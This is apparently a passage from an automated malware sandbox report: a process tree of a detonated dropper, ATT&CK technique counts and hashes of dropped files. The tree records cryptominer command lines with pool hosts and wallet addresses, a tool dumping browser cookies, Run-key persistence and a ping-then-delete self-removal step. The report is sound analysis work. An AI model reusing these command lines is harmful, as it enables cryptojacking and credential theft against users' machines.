                                                                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\CWUXzWKCkA\CWUXzWKCkA.dll" CWUXzWKCkA
                                                                                                                    11⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Drops file in System32 directory
                                                                                                                    PID:2328
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfE03.tmp\tempfile.ps1"
                                                                                                                  10⤵
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  PID:7048
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfE03.tmp\tempfile.ps1"
                                                                                                                  10⤵
                                                                                                                    PID:7160
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfE03.tmp\tempfile.ps1"
                                                                                                                    10⤵
                                                                                                                      PID:7164
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfE03.tmp\tempfile.ps1"
                                                                                                                      10⤵
                                                                                                                        PID:6224
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsfE03.tmp\tempfile.ps1"
                                                                                                                        10⤵
                                                                                                                          PID:6240
                                                                                                                        • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                          "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                          10⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:6376
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2bsccvt2.raw\GcleanerWW.exe /mixone & exit
                                                                                                                      8⤵
                                                                                                                        PID:5932
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vs4xnnwi.ybe\toolspab1.exe & exit
                                                                                                                        8⤵
                                                                                                                          PID:5784
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\vs4xnnwi.ybe\toolspab1.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\vs4xnnwi.ybe\toolspab1.exe
                                                                                                                            9⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:5708
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\vs4xnnwi.ybe\toolspab1.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\vs4xnnwi.ybe\toolspab1.exe
                                                                                                                              10⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                              PID:4136
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pdenigfi.lnf\c7ae36fa.exe & exit
                                                                                                                          8⤵
                                                                                                                            PID:5896
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\pdenigfi.lnf\c7ae36fa.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\pdenigfi.lnf\c7ae36fa.exe
                                                                                                                              9⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                              PID:5348
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c4kdsnjz.k2a\app.exe /8-2222 & exit
                                                                                                                            8⤵
                                                                                                                              PID:5696
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\c4kdsnjz.k2a\app.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\c4kdsnjz.k2a\app.exe /8-2222
                                                                                                                                9⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:4640
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\c4kdsnjz.k2a\app.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\c4kdsnjz.k2a\app.exe" /8-2222
                                                                                                                                  10⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  PID:5056
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
                                                                                                                      4⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4528
                                                                                                                      • C:\Users\Admin\AppData\Roaming\DACC.tmp.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\DACC.tmp.exe"
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:5564
                                                                                                                        • C:\Users\Admin\AppData\Roaming\DACC.tmp.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\DACC.tmp.exe"
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Checks processor information in registry
                                                                                                                          PID:5672
                                                                                                                      • C:\Users\Admin\AppData\Roaming\DF60.tmp.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\DF60.tmp.exe"
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Adds Run key to start application
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:5924
                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                          -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w26975@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                          6⤵
                                                                                                                            PID:5656
                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w19671 --cpu-max-threads-hint 50 -r 9999
                                                                                                                            6⤵
                                                                                                                            • Blocklisted process makes network request
                                                                                                                            PID:5344
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
                                                                                                                          5⤵
                                                                                                                            PID:5796
                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                              ping 127.0.0.1
                                                                                                                              6⤵
                                                                                                                              • Runs ping.exe
                                                                                                                              PID:5096
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe"
                                                                                                                          4⤵
                                                                                                                            PID:212
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gaoou.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gaoou.exe"
                                                                                                                            4⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Adds Run key to start application
                                                                                                                            PID:6036
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4780
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5872
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5660
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5492
                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                      1⤵
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                      • Modifies registry class
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:1220
                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                      PID:656
                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                      1⤵
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:6056
                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                      1⤵
                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                      • Modifies registry class
                                                                                                                      PID:4340
                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                      1⤵
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Modifies registry class
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:5748
                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                      PID:6140
                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                      1⤵
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:4224
                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                      1⤵
                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                      PID:5168
                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Modifies registry class
                                                                                                                      PID:2804
                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                      1⤵
                                                                                                                        PID:5976
                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                        1⤵
                                                                                                                          PID:5096
                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                          1⤵
                                                                                                                          • Modifies registry class
                                                                                                                          PID:6072
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\F1F8.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\F1F8.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:4104
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4F5.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\4F5.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:6008
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6008 -s 272
                                                                                                                            2⤵
                                                                                                                            • Program crash
                                                                                                                            PID:6308
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\C39.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\C39.exe
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5832
                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                          1⤵
                                                                                                                            PID:5236
                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                            C:\Windows\explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:5556
                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                              1⤵
                                                                                                                                PID:5768
                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                1⤵
                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                PID:6108
                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                1⤵
                                                                                                                                  PID:5148
                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                  PID:5848
                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  1⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:212
                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                  PID:4920
                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:5280
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                    1⤵
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:6728
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                    1⤵
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:6868
                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                    1⤵
                                                                                                                                      PID:7096
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                      1⤵
                                                                                                                                        PID:7084
                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                        1⤵
                                                                                                                                        • Modifies registry class
                                                                                                                                        PID:6612
                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                        1⤵
                                                                                                                                          PID:5484
                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                            C:\Windows\system32\WerFault.exe -u -p 5484 -s 1360
                                                                                                                                            2⤵
                                                                                                                                            • Program crash
                                                                                                                                            • Checks processor information in registry
                                                                                                                                            • Enumerates system info in registry
                                                                                                                                            PID:1356

                                                                                                                                        Network

                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                        Persistence

                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                        1
                                                                                                                                        T1060

                                                                                                                                        BITS Jobs

                                                                                                                                        1
                                                                                                                                        T1197

                                                                                                                                        Defense Evasion

                                                                                                                                        Modify Registry

                                                                                                                                        3
                                                                                                                                        T1112

                                                                                                                                        BITS Jobs

                                                                                                                                        1
                                                                                                                                        T1197

                                                                                                                                        Install Root Certificate

                                                                                                                                        1
                                                                                                                                        T1130

                                                                                                                                        Credential Access

                                                                                                                                        Credentials in Files

                                                                                                                                        5
                                                                                                                                        T1081

                                                                                                                                        Discovery

                                                                                                                                        Software Discovery

                                                                                                                                        1
                                                                                                                                        T1518

                                                                                                                                        Query Registry

                                                                                                                                        5
                                                                                                                                        T1012

                                                                                                                                        System Information Discovery

                                                                                                                                        6
                                                                                                                                        T1082

                                                                                                                                        Security Software Discovery

                                                                                                                                        1
                                                                                                                                        T1063

                                                                                                                                        Peripheral Device Discovery

                                                                                                                                        1
                                                                                                                                        T1120

                                                                                                                                        Remote System Discovery

                                                                                                                                        1
                                                                                                                                        T1018

                                                                                                                                        Collection

                                                                                                                                        Data from Local System

                                                                                                                                        5
                                                                                                                                        T1005

                                                                                                                                        Command and Control

                                                                                                                                        Web Service

                                                                                                                                        1
                                                                                                                                        T1102

                                                                                                                                        Replay Monitor

                                                                                                                                        Loading Replay Monitor...

                                                                                                                                        Downloads

                                                                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                          MD5

                                                                                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                          SHA1

                                                                                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                          SHA256

                                                                                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                          SHA512

                                                                                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                          MD5

                                                                                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                          SHA1

                                                                                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                          SHA256

                                                                                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                          SHA512

                                                                                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                        • C:\Program Files\MSBuild\ZRBQWTJEZE\ultramediaburner.exe
                                                                                                                                          MD5

                                                                                                                                          6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                          SHA1

                                                                                                                                          938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                          SHA256

                                                                                                                                          b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                          SHA512

                                                                                                                                          a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                        • C:\Program Files\MSBuild\ZRBQWTJEZE\ultramediaburner.exe
                                                                                                                                          MD5

                                                                                                                                          6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                          SHA1

                                                                                                                                          938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                          SHA256

                                                                                                                                          b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                          SHA512

                                                                                                                                          a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                        • C:\Program Files\install.dat
                                                                                                                                          MD5

                                                                                                                                          806c3221a013fec9530762750556c332

                                                                                                                                          SHA1

                                                                                                                                          36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                                          SHA256

                                                                                                                                          9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                                          SHA512

                                                                                                                                          56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                                        • C:\Program Files\install.dll
                                                                                                                                          MD5

                                                                                                                                          fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                          SHA1

                                                                                                                                          6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                          SHA256

                                                                                                                                          9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                          SHA512

                                                                                                                                          0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                          MD5

                                                                                                                                          efa8c02f19d23a645a42fda3613f137a

                                                                                                                                          SHA1

                                                                                                                                          aaf83888b5a80c1e6974e7c0a3fc6d4f83545e9f

                                                                                                                                          SHA256

                                                                                                                                          5c1d35ed150236750fb98f8542ec911696cdd85a79c7eb6f6b04b928811922a9

                                                                                                                                          SHA512

                                                                                                                                          923d9c778b426a2605b25f886e5634fe8683b2ce3262a5a5d0f0b54751de9d8423221d036bfdc1e11026f9693706ad262d9576b83078e78263d5675ca89c1e6b

                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                          MD5

                                                                                                                                          8e4ff690acaeb8fbaea2c8a00c0d8c64

                                                                                                                                          SHA1

                                                                                                                                          f712fe3fd92d167e476a6217bad4986e0739a5d8

                                                                                                                                          SHA256

                                                                                                                                          29db05c3bd1169d1482479d680bdbf92749b3448d856de33408c6f24c76d013c

                                                                                                                                          SHA512

                                                                                                                                          834f2f6c67fb46cb005790191796407e87cfd6064930f505c60575f10ece7bb4dede146c8a05f3540d4a7c92815a0a299cac6f4abeadef92ca822ee486abcb55

                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                          MD5

                                                                                                                                          de9c6bd16eefb002bdcd0d84792a6342

                                                                                                                                          SHA1

                                                                                                                                          028598d8b0507c82bcc240d1cc9fb83444339b9c

                                                                                                                                          SHA256

                                                                                                                                          1c3fe2fb5f76828f68780d19018b3aca62fa58a1d2fc31bb82533c1f0e3a9cca

                                                                                                                                          SHA512

                                                                                                                                          6408b828c71bbe75782e07cbb4593bb55565391318f9a1c2854fcc5e9f3709bc9550ecff1fb8bfaa7a64f39ccb62b598b3866d3f441fde27c5c9801b5e83d263

                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                          MD5

                                                                                                                                          62be8c562ca505da894aa748ff5149d7

                                                                                                                                          SHA1

                                                                                                                                          d910959cd73d3c21f065670c30e2f123eb1d5f3f

                                                                                                                                          SHA256

                                                                                                                                          df0c8652d7ac0c6dac850d0e3cb243015f6e943b0560af73a364b20e4face642

                                                                                                                                          SHA512

                                                                                                                                          b589c44c331a250cebdd5f79c9bf41c5e891dcbb6898f7797f234457f42f3fb31c2b1bf7b10bba8389a70593888974af7a447a0fcdd0ad863ca67a22bc903e81

                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\OPJKI8LB.cookie
                                                                                                                                          MD5

                                                                                                                                          11ba326b7cfa7762edd04b711a7137aa

                                                                                                                                          SHA1

                                                                                                                                          d49ca59e34198e7a7235c2bf1fb2179f18343170

                                                                                                                                          SHA256

                                                                                                                                          af1fc7542435bc24c6ab2762d6abb3c3beb080e1e8dc6ff96f0739d8e2f73d94

                                                                                                                                          SHA512

                                                                                                                                          1460e5c7d2ff22fc5ce5b37c0ca5447096b15344c8e510a85c65e897d3c5e4f6281bc0dfc8e9f29a44e3a35ae6606849e703d8bab71faf460850fab6728c0ed1

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1e-7f929-af5-589b9-6b7bfabae4da2\Paejaepelota.exe
                                                                                                                                          MD5

                                                                                                                                          2e91d25073151415f8c39de2262cbba8

                                                                                                                                          SHA1

                                                                                                                                          32544481a34273a1a870822152d201ea9c19b34d

                                                                                                                                          SHA256

                                                                                                                                          0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                                                          SHA512

                                                                                                                                          306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1e-7f929-af5-589b9-6b7bfabae4da2\Paejaepelota.exe
                                                                                                                                          MD5

                                                                                                                                          2e91d25073151415f8c39de2262cbba8

                                                                                                                                          SHA1

                                                                                                                                          32544481a34273a1a870822152d201ea9c19b34d

                                                                                                                                          SHA256

                                                                                                                                          0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                                                          SHA512

                                                                                                                                          306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1e-7f929-af5-589b9-6b7bfabae4da2\Paejaepelota.exe.config
                                                                                                                                          MD5

                                                                                                                                          98d2687aec923f98c37f7cda8de0eb19

                                                                                                                                          SHA1

                                                                                                                                          f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                                          SHA256

                                                                                                                                          8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

